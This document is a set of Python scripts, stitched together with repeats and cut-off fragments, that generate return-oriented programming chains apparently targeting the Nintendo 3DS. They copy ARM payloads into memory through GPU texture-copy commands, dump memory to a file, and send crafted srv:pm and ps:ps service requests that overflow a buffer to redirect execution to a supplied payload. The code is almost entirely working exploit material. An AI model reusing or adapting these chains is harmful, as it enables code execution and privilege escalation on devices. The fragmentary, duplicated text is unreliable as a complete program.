def main(argv):
arm_code = ""
with open(argv[0], "rb") as fp:
arm_code = fp.read()
armCodeSize = len(arm_code)
arm_code += struct.pack("<I", 0xDEADBEEF) * (16 - armCodeSize % 16)
armCodeSize += (16 - armCodeSize % 16)
r = ROP(0x002B0000)
r.call_lr(memcpy, [gsp_addr + gsp_code_addr, Ref("arm_code"), armCodeSize])
# pop {r4-r6, pc}
r.call(GSPGPU_FlushDataCache + 4, [gsp_handle, 0xFFFF8001, gsp_addr + gsp_code_addr, armCodeSize], 3)
# ldmfd sp!, {r4-r8, pc}
r.call(nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue + 4, [0x27c580 + 0x58, Ref("gxCommand")], 5)
r.pop_pc()
r.pop_pc()
r.pop_pc()
r.call_lr(svcSleepThread, [0x3B9ACA00, 0x00000000])
# Jump to payload
r.i32(0x100000 + payload_addr)
# Data
r.label("gxCommand")
r.i32(0x00000004) # SetTextureCopy
r.i32(gsp_addr + gsp_code_addr) # source
r.i32(gsp_addr + fcram_code_addr + payload_addr) # destination
r.i32(armCodeSize) # size
r.i32(0x00000000) # dim in
r.i32(0x00000000) # dim out
r.i32(0x00000008) # flags
r.i32(0x00000000) # unused
r.label("arm_code")
r.data(arm_code)
rop = r.gen()
with open(argv[1], "wb") as fl:
fl.write(rop)
# This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, version 2.0. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License 2.0 for more details. # # A copy of the GPL 2.0 should have been included with the program. # If not, see http://www.gnu.org/licenses/ from p3ds.util import * from p3ds.ROP import * r = ROP(0x002B0000) # Clear 0x279004 and 0x279008 #r.pop_r4(0x279004) #r.pop_r1(0x279008) #r.i32(0x101AAC) #r.i32(0x000004) #r.pop_r1(0) #r.store_r1(0x279004) #r.store_r1(0x279008) r.store_i32(0, 0x279004) r.store_i32(0, 0x279008)
def main(argv):
r = ROP(0x002B0000)
# Set file object u64 offset to 0
r.store_i32(0, 0x279004)
r.store_i32(0, 0x279008)
# file_open(0x279000, "YS:/DUMP.BIN", 6)
r.call(0x1B82AC, [0x279000, Ref("fname"), 6], 5)
# file_write(0x279000, 0x279020, 0x100000, 0x300000)
r.call(0x1B3B54, [0x279000, 0x279020, 0x100000, 0x300000], 9)
# Data.
r.label("fname")
r.data("YS:/DUMP.BIN".encode('utf-16le') + "\x00\x00")
rop = r.gen()
#hexdump(rop, base=0x2B0000)
with open(argv[0], "wb") as f:
f.write(rop)
def main(argv):
r = ROP(0x002B0000)
# Set file object u64 offset to 0
r.store_i32(0, 0x279004)
r.store_i32(0, 0x279008)
# file_open(0x279000, "YS:/DUMP.BIN", 6)
r.call(0x1B82AC, [0x279000, Ref("fname"), 6], 5)
# file_write(0x279000, 0x279020, 0x100000, 0x300000)
r.call(0x1B3B54, [0x279000, 0x279020, 0x100000, 0x300000], 9)
# Data.
r.label("fname")
r.data("YS:/DUMP.BIN".encode('utf-16le') + "\x00\x00")
rop = r.gen()
#hexdump(rop, base=0x2B0000)
with open(argv[0], "wb") as f:
f.write(rop)
from p3ds.util import *
from p3ds.ROP import *
# Fill ARM payload here (pls size aligned to 4 bytes, base @ 0x080C3EE0):
PAYLOAD = ""
r = ROP(0x002B0000)
r.call_lr(0x1BEDC4, [Ref("port"), Ref("srv:pm")])
r.call(0x105C88, [], 3)
r.call_lr(0x129C34, [Ref("proc"), 0xFFFF8001])
r.pop_r4(0x279020)
r.i32(0x1C1958)
r.i32(0x44444444)
r.call_lr(0x10C2AC, [0x279024])
r.mov_r4_r0()
r.pop_r0(0x04040040)
r.pop_r1_r5_r6(Ref("proc"), Ref("port"), 0x66666666)
r.call(0x12A640, [], 3)
r.pop_r4(0x279020)
r.i32(0x1C1958)
r.i32(0x44444444)
r.call_lr(0x10C2AC, [0x279024])
r.mov_r4_r0()
r.pop_r0(0x04030082)
r.pop_r1_r5_r6(Ref("proc"), Ref("port"), 0x66666666)
r.call(0x12A640, [], 3)
r.call(0x1B2134, [Ref("port"), Ref("ps:ps"), 0x00000005], 5)
r.pop_r4(0x279020)
r.i32(0x1C1958)
r.i32(0x44444444)
# This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, version 2.0. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License 2.0 for more details. # # A copy of the GPL 2.0 should have been included with the program. # If not, see http://www.gnu.org/licenses/ from p3ds.util import * from p3ds.ROP import * r = ROP(0x002B0000) # Clear 0x279004 and 0x279008 #r.pop_r4(0x279004) #r.pop_r1(0x279008) #r.i32(0x101AAC) #r.i32(0x000004) #r.pop_r1(0) #r.store_r1(0x279004) #r.store_r1(0x279008) r.store_i32(0, 0x279004) r.store_i32(0, 0x279008)
def main(argv):
# Fill ARM payload here (pls size aligned to 4 bytes, base @ 0x080C3EE0):
if (len(sys.argv) < 3):
print "needs a filename !"
exit()
f1 = open(sys.argv[2],"rb")
#"\x00\x00\x09\xEF"#f.read()
# Fill ARM payload here (pls size aligned to 4 bytes, base @ 0x080C3EE0):
PAYLOAD = f1.read()
r = ROP(0x002B0000)
# ConnectToPort(&port, "srv:pm");
r.call_lr(0x1BEDC4, [Ref("port"), Ref("srv:pm")])
# sub_10CBC0()
r.call(0x105C88, [], 3)
# GetProcessId(&proc, 0xFFFF8001);
r.call_lr(0x129C34, [Ref("proc"), 0xFFFF8001])
request(r, 0x04040040, Ref("proc"), Ref("port"))
request(r, 0x04030082, Ref("proc"), Ref("port"))
# sub_1B2130(&port, "ps:ps", 0x00000005)
r.call(0x1B2134, [Ref("port"), Ref("ps:ps"), 0x00000005], 5)
request(r, 0x20244, Ref("request"), Ref("port"))
r.i32(0x19FB09)
# Data.
r.label("srv:pm")
r.data("srv:pm\x00")
r.label("ps:ps")
r.data("ps:ps\x00")
# Port.
r.label("port")
r.data("\x00" * 0x04)
# Proc.
r.label("proc")
r.data(
"\x00\x00\x00\x00\x18\x00\x00\x00\x02\x00\x18\x00")
r.i32(Ref("wat?"))
r.data("\x00" * 0x30)
r.label("wat?")
r.data(
"\x41\x50\x54\x3A\x55\x00\x00\x00\x79\x32\x72\x3A\x75\x00\x00\x00"
"\x67\x73\x70\x3A\x3A\x47\x70\x75\x6E\x64\x6D\x3A\x75\x00\x00\x00"
"\x66\x73\x3A\x55\x53\x45\x52\x00\x68\x69\x64\x3A\x55\x53\x45\x52"
"\x64\x73\x70\x3A\x3A\x44\x53\x50\x63\x66\x67\x3A\x75\x00\x00\x00"
"\x66\x73\x3A\x52\x45\x47\x00\x00\x70\x73\x3A\x70\x73\x00\x00\x00"
"\x6E\x73\x3A\x73\x00\x00\x00\x00\x61\x6D\x3A\x6E\x65\x74\x00\x00")
r.data("\x00" * 0xA0)
# Request.
r.label("request")
r.data("\x00" * 0x20)
r.data("\x00\x00\x00\x00\x02\x00\x82\x00")
r.i32(Ref("reqpart1"))
r.data("\x0A\x44\x0E\x00") # 0x7440 << 4 | 0xA
r.i32(Ref("reqpart2"))
r.data("\x00" * 0x4C)
r.label("reqpart1")
r.data("\x00" * 0x200)
r.data("\x00\xA2\x03\x00")
r.data("\x00" * 0xFC)
r.label("reqpart2")
# length = 0x7440, return addr = 0x080C3EE0
r.data(PAYLOAD + struct.pack("<I", 0x080C3EE0) * (0xE440/4 - len(PAYLOAD)/4))
rop = r.gen()
#hexdump(rop, base=0x2B0000)
with open(argv[0], "wb") as f:
f.write(rop)
def main(argv):
# Fill ARM payload here (pls size aligned to 4 bytes, base @ 0x080C3EE0):
PAYLOAD = ""
r = ROP(0x002B0000)
# ConnectToPort(&port, "srv:pm");
r.call_lr(0x1BEDC4, [Ref("port"), Ref("srv:pm")])
# sub_10CBC0()
r.call(0x105C88, [], 3)
# GetProcessId(&proc, 0xFFFF8001);
r.call_lr(0x129C34, [Ref("proc"), 0xFFFF8001])
request(r, 0x04040040, Ref("proc"), Ref("port"))
request(r, 0x04030082, Ref("proc"), Ref("port"))
# sub_1B2130(&port, "ps:ps", 0x00000005)
r.call(0x1B2134, [Ref("port"), Ref("ps:ps"), 0x00000005], 5)
request(r, 0x20244, Ref("request"), Ref("port"))
r.i32(0x19FB09)
# Data.
r.label("srv:pm")
r.data("srv:pm\x00")
r.label("ps:ps")
r.data("ps:ps\x00")
# Port.
r.label("port")
r.data("\x00" * 0x04)
# Proc.
r.label("proc")
r.data(
"\x00\x00\x00\x00\x18\x00\x00\x00\x02\x00\x18\x00")
r.i32(Ref("wat?"))
r.data("\x00" * 0x30)
r.label("wat?")
r.data(
"\x41\x50\x54\x3A\x55\x00\x00\x00\x79\x32\x72\x3A\x75\x00\x00\x00"
"\x67\x73\x70\x3A\x3A\x47\x70\x75\x6E\x64\x6D\x3A\x75\x00\x00\x00"
"\x66\x73\x3A\x55\x53\x45\x52\x00\x68\x69\x64\x3A\x55\x53\x45\x52"
"\x64\x73\x70\x3A\x3A\x44\x53\x50\x63\x66\x67\x3A\x75\x00\x00\x00"
"\x66\x73\x3A\x52\x45\x47\x00\x00\x70\x73\x3A\x70\x73\x00\x00\x00"
"\x6E\x73\x3A\x73\x00\x00\x00\x00\x61\x6D\x3A\x6E\x65\x74\x00\x00")
r.data("\x00" * 0xA0)
# Request.
r.label("request")
r.data("\x00" * 0x20)
r.data("\x00\x00\x00\x00\x02\x00\x82\x00")
r.i32(Ref("reqpart1"))
r.data("\x0A\x44\x07\x00") # 0x7440 << 4 | 0xA
r.i32(Ref("reqpart2"))
r.data("\x00" * 0x4C)
r.label("reqpart1")
r.data("\x00" * 0x200)
r.data("\x00\xA2\x03\x00")
r.data("\x00" * 0xFC)
r.label("reqpart2")
# length = 0x7440, return addr = 0x080C3EE0
r.data(PAYLOAD + struct.pack("<I", 0x080C3EE0) * (0x7440/4 - len(PAYLOAD)/4))
rop = r.gen()
#hexdump(rop, base=0x2B0000)
with open(argv[0], "wb") as f:
f.write(rop)
from p3ds.util import *
from p3ds.ROP import *
import sys
# Fill ARM payload here (pls size aligned to 4 bytes, base @ 0x080C3EE0):
with open(sys.argv[1], "rb") as myfile:
PAYLOAD = myfile.read()
r = ROP(0x002B0000)
r.call_lr(0x1BEDC4, [Ref("port"), Ref("srv:pm")])
r.call(0x105C88, [], 3)
r.call_lr(0x129C34, [Ref("proc"), 0xFFFF8001])
r.pop_r4(0x279020)
r.i32(0x1C1958)
r.i32(0x44444444)
r.call_lr(0x10C2AC, [0x279024])
r.mov_r4_r0()
r.pop_r0(0x04040040)
r.pop_r1_r5_r6(Ref("proc"), Ref("port"), 0x66666666)
r.call(0x12A640, [], 3)
r.pop_r4(0x279020)
r.i32(0x1C1958)
r.i32(0x44444444)
r.call_lr(0x10C2AC, [0x279024])
r.mov_r4_r0()
r.pop_r0(0x04030082)
r.pop_r1_r5_r6(Ref("proc"), Ref("port"), 0x66666666)
r.call(0x12A640, [], 3)
r.call(0x1B2134, [Ref("port"), Ref("ps:ps"), 0x00000005], 5)
r.pop_r4(0x279020)
r.i32(0x1C1958)